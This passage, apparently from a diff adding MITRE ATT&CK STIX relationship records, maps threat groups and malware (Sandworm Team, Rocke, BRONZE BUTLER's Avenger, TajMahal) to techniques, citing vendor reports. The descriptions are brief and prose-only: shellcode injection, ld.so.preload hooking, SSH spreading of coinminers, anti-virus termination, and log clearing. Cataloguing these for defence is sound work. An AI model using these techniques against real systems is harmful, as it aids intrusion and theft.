+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--699171c1-0d17-48d7-a741-0e4a0ed4ef62",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.413Z",
+ "created": "2020-06-11T16:18:16.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--73af2cc2-699d-4183-b69f-f15b3e8c0494",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.654Z",
+ "created": "2020-06-11T16:18:16.787Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--96c91811-fec3-43a6-890f-08921e543325",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.661Z",
+ "created": "2020-06-11T16:18:16.792Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--4a5d8511-633c-4429-ac64-37a4815bf545",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.657Z",
+ "created": "2020-06-11T16:18:16.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--99365890-fc6c-46ec-bf1f-66ccbe5d52e7",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.651Z",
+ "created": "2020-06-11T16:18:16.795Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff5d1433-de7a-4aba-95c4-5d92782589f9",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.664Z",
+ "created": "2020-06-11T16:19:17.925Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor which could execute a supplied DLL using rundll32.exe.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e6cbb16-a5cb-4957-8654-dfde2471c3de",
+ "type": "relationship",
+ "modified": "2020-06-11T16:28:58.231Z",
+ "created": "2020-06-11T16:28:58.231Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor to enumerate information about the infected system's operating system.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f7f1c7c3-192b-4675-815d-0a61b3e3a206",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.249Z",
+ "created": "2020-06-11T16:28:58.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate email settings, including usernames and passwords, from the M.E.Doc application.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7e6e46e1-6990-4d37-87cb-9ef6a488a8a1",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.240Z",
+ "created": "2020-06-11T16:28:58.270Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots July 2017",
+ "url": "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/",
+ "description": "Cherepanov, A.. (2017, July 4). Analysis of TeleBots\u2019 cunning backdoor . Retrieved June 11, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) used malware to enumerate proxy settings from the M.E.Doc application.(Citation: ESET Telebots July 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c7cf1f99-d2f8-4ce2-b32e-3cd6116d9e15",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.242Z",
+ "created": "2020-06-11T16:28:58.305Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has incorporated code into several tools that attempts to terminate anti-virus processes.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8cb3eda9-3829-4bc0-aa72-704df128d92e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.666Z",
+ "created": "2020-06-11T19:27:54.270Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used TROJ_GETVERSION to discover system services.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--069d3677-2694-4385-b5c3-ea6e231d26d9",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.640Z",
+ "created": "2020-06-11T19:27:54.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has cleared log files within the /var/log/ folder.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--93b62fc4-f024-4482-9ea1-041bc3d29bfd",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.230Z",
+ "created": "2020-06-11T19:52:07.230Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used uname -m to collect the name and information about the infected system's kernel.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--322876d6-1b49-43d8-9e4a-590919d1f930",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.232Z",
+ "created": "2020-06-11T19:52:07.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--de8fefef-bfe7-4720-a443-66713a47b439",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.241Z",
+ "created": "2020-06-11T19:52:07.241Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--fa69ac7a-8031-4fac-91e2-65e90f378cd1",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.273Z",
+ "created": "2020-06-11T19:52:07.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--47440b3d-e6ef-4f7d-b732-453d1684424a",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.693Z",
+ "created": "2020-06-11T19:52:07.283Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified UPX headers after packing files to break unpackers.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--277971c7-d42e-497f-8df4-be5b4bc094f8",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.682Z",
+ "created": "2020-06-11T19:52:07.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--521c66b9-fe52-4c2b-bc32-8ed3d98c7a71",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.318Z",
+ "created": "2020-06-11T19:52:07.318Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--47b95300-a51c-4d91-9bbe-e40956df2081",
+ "type": "relationship",
+ "modified": "2020-06-16T13:34:56.503Z",
+ "created": "2020-06-11T19:52:07.337Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used shell scripts which download mining executables and saves them with the filename \"java\".(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ff438715-ffa8-4fa2-a69e-7126dd60bfb3",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.350Z",
+ "created": "2020-06-11T19:52:07.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has extracted tar.gz files after downloading them from a C2 server.(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c8fdab57-1e10-4f66-a1de-59a876c99ab1",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.352Z",
+ "created": "2020-06-11T19:52:07.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin, Gitee, and GitLab for Command and Control.(Citation: Anomali Rocke March 2019)(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--29552ed5-ecfd-4a97-a6c9-d6da25181e1a",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.355Z",
+ "created": "2020-06-11T19:52:07.355Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) issued wget requests from infected systems to the C2.(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--37327da8-efd3-48c0-9f91-38f384f8579e",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.391Z",
+ "created": "2020-06-11T19:52:07.391Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--15c3f3a3-03c9-4591-a2d2-64b5eafbd4a7",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.412Z",
+ "created": "2020-06-11T20:08:11.412Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5c160f0c-1c12-4ab0-bd6e-a30f8d5bc168",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.417Z",
+ "created": "2020-06-11T20:08:11.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the LoadLibrary call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b4ef6c6e-d7aa-451a-b071-faf0138cfbff",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.419Z",
+ "created": "2020-06-11T20:08:11.419Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
